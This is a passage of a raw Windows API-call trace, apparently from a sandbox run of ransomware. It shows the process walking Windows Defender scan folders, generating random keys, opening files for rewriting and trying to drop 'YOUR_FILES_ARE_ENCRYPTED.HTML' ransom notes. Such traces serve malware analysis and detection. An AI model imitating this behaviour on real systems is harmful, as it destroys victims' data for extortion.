wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0110.372] GetProcessHeap () returned 0x600000 [0110.372] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\2\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.372] GetProcessHeap () returned 0x600000 [0110.372] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.372] GetProcessHeap () returned 0x600000 [0110.372] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.373] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="3", cAlternateFileName="")) returned 1 [0110.373] StrStrIW (lpFirst="3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.373] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3") returned 67 [0110.373] GetProcessHeap () returned 0x600000 [0110.373] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.374] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3" [0110.374] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\*" [0110.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf49c5b5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.374] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf49c5b5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.374] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 1 [0110.374] StrStrIW (lpFirst="0000000000000000.idx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.374] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\0000000000000000.idx") returned 88 [0110.374] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0110.374] lstrlenW (lpString=".idx") returned 4 [0110.374] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0110.374] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\0000000000000000.idx" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\3\\0000000000000000.idx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0110.374] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=80) returned 1 [0110.375] CloseHandle (hObject=0x310) returned 1 [0110.375] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf49c5b5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf49c5b5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4a000d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.375] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf49c5b5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf49c5b5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4a000d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.375] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.375] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0110.375] GetProcessHeap () returned 0x600000 [0110.375] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\3\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\3\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.375] GetProcessHeap () returned 0x600000 [0110.375] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.375] GetProcessHeap () returned 0x600000 [0110.375] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.376] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="4", cAlternateFileName="")) returned 1 [0110.376] StrStrIW (lpFirst="4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.376] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4") returned 67 [0110.376] GetProcessHeap () returned 0x600000 [0110.376] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.377] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4" [0110.377] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\*" [0110.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4b24ba, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.377] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4b24ba, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.377] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 1 [0110.377] StrStrIW (lpFirst="0000000000000000.idx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.378] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\0000000000000000.idx") returned 88 [0110.378] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0110.378] lstrlenW (lpString=".idx") returned 4 [0110.378] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0110.378] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\0000000000000000.idx" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\4\\0000000000000000.idx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0110.378] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=80) returned 1 [0110.378] CloseHandle (hObject=0x310) returned 1 [0110.378] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4ac2f4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4ac2f4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4b60cb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.378] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4ac2f4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4ac2f4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4b60cb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.378] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.378] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0110.378] GetProcessHeap () returned 0x600000 [0110.378] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\4\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\4\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.379] GetProcessHeap () returned 0x600000 [0110.379] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.379] GetProcessHeap () returned 0x600000 [0110.379] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.379] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4be7f8, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4be7f8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4c7364, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.379] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4be7f8, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4be7f8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4c7364, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.379] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.380] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0110.380] GetProcessHeap () returned 0x600000 [0110.380] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.380] GetProcessHeap () returned 0x600000 [0110.380] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.380] GetProcessHeap () returned 0x600000 [0110.380] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.381] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf848982, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xa2b1a6, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578", cAlternateFileName="MPCACH~1.3F2")) returned 1 [0110.381] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.381] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578") returned 173 [0110.381] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578") returned=".3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578" [0110.381] lstrlenW (lpString=".3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578") returned 65 [0110.381] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf907e70d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf907e70d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf90caa0a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x18ea5e4, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B", cAlternateFileName="MPCACH~1.5B")) returned 1 [0110.381] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.381] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B") returned 111 [0110.381] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B") returned=".5B" [0110.381] lstrlenW (lpString=".5B") returned 3 [0110.381] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B") returned=".5B" [0110.381] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf89c9d40, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf89c9d40, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf8ceae5e, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6a1ab6c, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67", cAlternateFileName="MPCACH~1.67")) returned 1 [0110.381] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.381] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67") returned 111 [0110.381] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67") returned=".67" [0110.381] lstrlenW (lpString=".67") returned 3 [0110.381] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67") returned=".67" [0110.381] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x820, ftCreationTime.dwLowDateTime=0xf8d374fb, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf8d374fb, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf8d83941, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x3b14000, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79", cAlternateFileName="MPCACH~1.79")) returned 1 [0110.381] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.382] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79") returned 111 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79") returned=".79" [0110.382] lstrlenW (lpString=".79") returned 3 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79") returned=".79" [0110.382] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x820, ftCreationTime.dwLowDateTime=0xf8da9a4e, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf8da9a4e, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf8da9a4e, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x529000, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C", cAlternateFileName="MPCACH~1.7C")) returned 1 [0110.382] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.382] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C") returned 111 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C") returned=".7C" [0110.382] lstrlenW (lpString=".7C") returned 3 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C") returned=".7C" [0110.382] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8e8ea4a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf8e8ea4a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf8e8ea4a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x3cff18, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E", cAlternateFileName="MPCACH~1.7E")) returned 1 [0110.382] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.382] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E") returned 111 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E") returned=".7E" [0110.382] lstrlenW (lpString=".7E") returned 3 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E") returned=".7E" [0110.382] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8fe5e00, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf8fe5e00, 